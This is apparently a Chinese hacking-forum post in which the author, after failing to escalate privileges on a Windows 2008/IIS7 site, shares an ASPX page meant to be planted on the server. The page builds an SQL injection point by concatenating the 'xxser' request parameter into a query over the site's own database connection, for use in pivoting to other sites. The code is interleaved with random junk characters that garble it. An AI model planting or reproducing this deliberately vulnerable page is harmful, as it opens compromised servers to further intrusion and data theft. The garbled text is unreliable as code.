昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。8 L" f- o- v6 e4 ]
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
i/ W+ l4 ^$ M* |. i代码量不多,自己写个拉倒了。烦死了。
$ R2 ~1 w. N ?4 m0 h' }8 Q! \- y( {
& y+ s( d6 |4 Z- I4 A3 |, V9 c/ U t5 i4 S8 w" j8 g% z
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
: }; a, y2 \7 s$ s& a! v$ X3 r<html xmlns="http://www.w3.org/1999/xhtml"> }. I' h$ w/ @4 Y: w& [3 Y8 P! G- w
<head runat="server">3 n- }% C$ G" q4 X; a+ _
<title>暗影aspx构造注射专用页面</title>
% o$ R: O! S$ J3 h0 t$ R</head>
, l; D! h8 P t7 q {9 Z. c- h<body>
/ N" ~) ? s2 @! |0 p0 j <form id="form1" runat="server">+ L m( s% Z7 _$ J
<div>% d9 h+ Q7 p) A. h1 H Y$ b
<script language="c#" runat="server">9 G+ n7 D! ~; A5 p6 l' e
4 C% ]3 P& T4 U" c1 L# I; x void page_init(object sender, EventArgs e)
: q4 m# w4 }0 ~- x- F4 t( z3 _ {, G& m. ?4 M% }
" e2 W& a. o W( ?+ ] @/ p; a. D: n System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
& I, v: |# y: p! r- M/ R
+ P. R' A8 I0 x V ]* D' m1 @ conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();+ K4 C& k4 `4 H
conn.Open();2 p5 D x' z/ c) T7 N8 b6 S
+ S: V7 m% W7 l5 j: t1 ^
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1: t( r$ ^9 B# g4 k6 |2 G
+ Q9 x% J6 A: ?8 Y ^ System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
$ A2 d) `" t/ e% z/ o int x = command.ExecuteNonQuery();
& R7 I; ^; h+ o0 u; v: q: Q Response.Write(i+"\n");, g, L/ R0 k: e3 ^$ ]5 C
Response.Write(x);$ K+ | G8 k4 Z& c7 A5 P
conn.Close();/ L; B% T8 z5 W' ]1 M4 ?) `
}
?( x, k* o) n: _1 _" F
4 L$ V' o) V+ w5 y; D; Y </script>
+ }/ U, s$ ~' l </div>
# J" O+ |. f9 ^6 l </form>
6 g2 i2 d- U% o! T( W1 r8 w V</body>9 d# g. H, j2 w) V
</html>
& Q/ L+ l' S% H1 r; A! V5 V% l3 i |